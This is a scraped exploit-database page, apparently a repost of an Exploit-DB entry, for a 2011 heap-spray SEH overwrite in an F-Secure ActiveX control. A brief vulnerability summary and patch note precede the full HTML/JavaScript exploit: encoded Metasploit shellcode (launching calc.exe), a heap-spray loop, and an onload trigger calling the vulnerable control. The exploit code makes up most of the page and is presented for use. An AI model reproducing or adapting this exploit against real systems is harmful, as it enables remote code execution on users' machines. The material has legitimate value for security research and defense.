Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
F-Secure Multiple Products ActiveX Remote SEH Overwrite Vulnerability(Heap Spray) - exploit.company
header-logo
Suggest Exploit
vendor:
Multiple Products
by:
41.w4r10r
7.5
CVSS
HIGH
ActiveX Remote SEH Overwrite
CWE
Product Name: Multiple Products
Affected Version From: F-Secure Anti-Virus 2010
Affected Version To: F-Secure Internet Security 2011
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP2 Eng, IE 6,7,8
2011

F-Secure Multiple Products ActiveX Remote SEH Overwrite Vulnerability(Heap Spray)

This exploit takes advantage of a SEH (Structured Exception Handling) overwrite vulnerability in multiple F-Secure products. It uses heap spray techniques to exploit the vulnerability.

Mitigation:

Update to the latest version of F-Secure products or apply the vendor's patch.
Source

Exploit-DB raw data:

# Exploit Title: F-Secure Multiple Products ActiveX Remote SEH Overwrite Vulnerability(Heap Spray)
# Discovered Date: 24/05/2011
# Author: 41.w4r10r
# Version: Multiple
# Tested on : Windows XP SP2 Eng, IE 6,7,8
#
# Exploit-DB Notes: moved to 'local' since you have to run it as a "trusted site". Or run as local intranet, and enable unsafe activex.



# Affected Products :  F-Secure Anti-Virus 2011
                       F-Secure Anti-Virus 2010
                       F-Secure Internet Security 2011
  		       F-Secure Internet Security 2010
 		       Solutions based on F-Secure Protection Service for Consumers version 9
		       Solutions based on F-Secure Protection Service for Business - Workstation security version 9

# Vendor Advisory: http://www.f-secure.com/en_EMEA-Labs/news-info/security-advisories/fsc-2011-3.html



# Special Thanks: B0nd , Wipu, Anarky, Godwin_Austin , Neo, The_Empty, FB1H2S, W3bD3vil, d4rkd4wn, d4rk357 and garage4hackers family
# Visit Us : http://garage4hackers.com





<html>
 <head>
  <title>F-Secure Multiple SEH Overwrite Vulnerability(Heap Sprays)</title>
  <script language="JavaScript" defer>
    function Check() {
      
    
 
// win32_exec -  EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com
var shellcode1 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
                          "%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
                          "%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
                          "%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
                          "%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
                          "%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
                          "%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +
                          "%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +
                          "%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +
                          "%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +
                          "%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" +
                          "%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" +
                          "%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" +
                          "%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" +
                          "%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" +
                          "%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" +
                          "%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" +
                          "%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" +
                          "%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" +
                          "%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" +
                          "%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" +
                          "%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" +
                          "%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" +
                          "%u314e%u7475%u7038%u7765%u4370");
 
 
    var bigblock = unescape("%u0A0A%u0A0A");
    var headersize = 20;
    var slackspace = headersize + shellcode1.length;
    while (bigblock.length < slackspace) bigblock += bigblock;
    var fillblock = bigblock.substring(0,slackspace);
    var block = bigblock.substring(0,bigblock.length - slackspace);
    while (block.length + slackspace < 0x40000) block = block + block + fillblock;
 
    var memory = new Array();
    for (i = 0; i < 330; i++){ memory[i] = block + shellcode1 }
     
    var buf = '';
    var arg1 ='Anything';
    while (buf.length < 1008) buf = buf + unescape("%0A%0A");
         
    obj.initialize(arg1 ,buf);
}  
   </script>
   
   
</head>
 <body onload="JavaScript: return Check();">
    <object classid="clsid:147B3695-4308-41D9-B1A4-770B87BAD342" id="obj" size="0" width="0">
  
	  Title : F-Secure Multiple Product SEH Overwrite Vulnerability(Heap Spray)
	  Affected Products :   <ul> <li> F-Secure Anti-Virus 2011</li>
				     <li> F-Secure Anti-Virus 2010</li>
				     <li> F-Secure Internet Security 2011</li>
				     <li> F-Secure Internet Security 2010</li>
				     <li>Solutions based on F-Secure Protection Service for Consumers version 9</li>
				     <li>Solutions based on F-Secure Protection Service for Business - Workstation security version 9 </li>
				</ul>
	  Author : 41.w4r10r<br>
	  Special Thanks: B0nd , Wipu, Anarky, Godwin_Austin , Neo, The_Empty, FB1H2S, W3bD3vil, d4rkd4wn, d4rk357 and garage4hackers family<br>
	  Contact Us: <a href="http://garage4hacker.com">Garage4hackers</a><br>
	  
	  
            
    </object>
 
 </body>
</html>